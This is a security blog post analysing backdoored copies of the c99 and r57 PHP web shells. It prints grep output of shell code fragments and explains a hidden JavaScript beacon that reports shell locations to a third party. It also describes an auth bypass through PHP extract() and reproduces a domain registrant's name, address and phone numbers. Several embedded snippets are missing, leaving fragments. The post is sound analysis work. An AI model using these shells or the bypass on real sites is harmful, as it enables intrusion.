TL;DR all shells from are backdoored, shockingly. But in a pretty clever way you probably didn’t expect.

You know sometimes when I find things in security that are probably unethical, I’m more impressed than morally distressed.

I decided to poke around some of the online sources for the typical shells (c99, r57, etc) and after a quick search:


I’ve got all the shells I’d ever need!

Or do I? Let’s check out this first site shall we?



C99 is probably the more famous one, so let’s take a look at it!

mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "https://" c99.php 

79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";} mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "http://" c99.php 11: 13:* WEB: 79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 99:$accessdeniedmess = "c99shell v.".$shver.": access denied"; 103:$c99sh_updatefurl = ""; //Update server 259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 599:# Home page: 855:?>

!C99Shell v. !


uname -a: ",1); ?> 

",1);} else {echo get_current_user();} ?> 


Incorect url!
";} 2912:if ($act == "about") {echo "

Idea, leading and coding by tristram[CCTeaM].
Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
Thanks all who report bugs.
All bugs send to tristram's ICQ #656555 .
";} 2926:

--[ c99shell v. powered by Captain Crunch Security Team | r57 shell | Generation time: ]--


Now immediately everyone’s first thought is to check the PHP itself for clever backdoors. After all, this is a backdoor shell so why wouldn’t it be a backdoored backdoor shell (bleh).

But notice this section:

Hmm, what’s the source for that page?


Ho-ho-ho that’s a little suspicious, so it’s making an image with the source being plus our current URL?

Naughty naughty, navigating to this URL we find:

Oh a blank page, that’s probably nothing at all!

Or…just maybe…they are capturing IP addresses to alert the website owners or steal the shells for themselves (far more likely).

I’m willing to bet there is a PHP auth-bypass in the code as well…

Auth Bypass Exploit

Notice this piece of code here:

Found this after diffing this c99 shell against other online copies. For those not familiar, extract() is a VERY dangerous command to use. Basically you pass it an array and it extracts the values into variables.

This example from the official PHP site says it all:

                   "size"  => "medium",
                   "shape" => "sphere");
extract($var_array, EXTR_PREFIX_SAME, "wddx");

echo "$color, $size, $shape, $wddx_size\n";


Guess what is right after that line?


So one could very easily over right $login, $md5_pass, etc to override the login.

EDIT: This same JS link is in all of the shells on the site. See r57.php:

  74 $head = '

The moral of this lesson is obvious but I’m more entertained by the fact that they went with a JS backdoor. Who would check the Javascript for backdoors? It’s the perfect crime!

The domain is apparently Turkish and has been registered for sometime, so I can’t imagine the amount of bad shells have been distributed.

** Registrant:
   Ýsmail Kalayli
   Gulbahar Mah. Gayret Sk. No:21 K:1
   Email Masking
   + 90-212-3564407

** Registrar:
NIC Handle	 : cth16-metu
Organization Name	: Çizgi Telekomünikasyon Hizmetleri San. ve Tic.Ltd.Þti.
Address	 : Esentepe Mah. Elif Sk. No:4 K:1
  Mecidiyeköy / Þiþli
Phone	 : + 90-212-2131213-
Fax	 : + 90-212-3564407

** Domain Servers:

** Additional Info:
Created on..............: 2008-Oct-22.
Expires on..............: 2015-Oct-21.

But let’s be honest, somebody has to have noticed this right…?

Or maybe nobody actually falls for this…?

Which isn’t even the source but copied from

For archiving reasons I’ll keep the source here to show the *current* backdoor in case it’s changed:

EDIT: I now have a moral dilemma because I’m sure people will abuse this exploit to break into more sites…Hmm…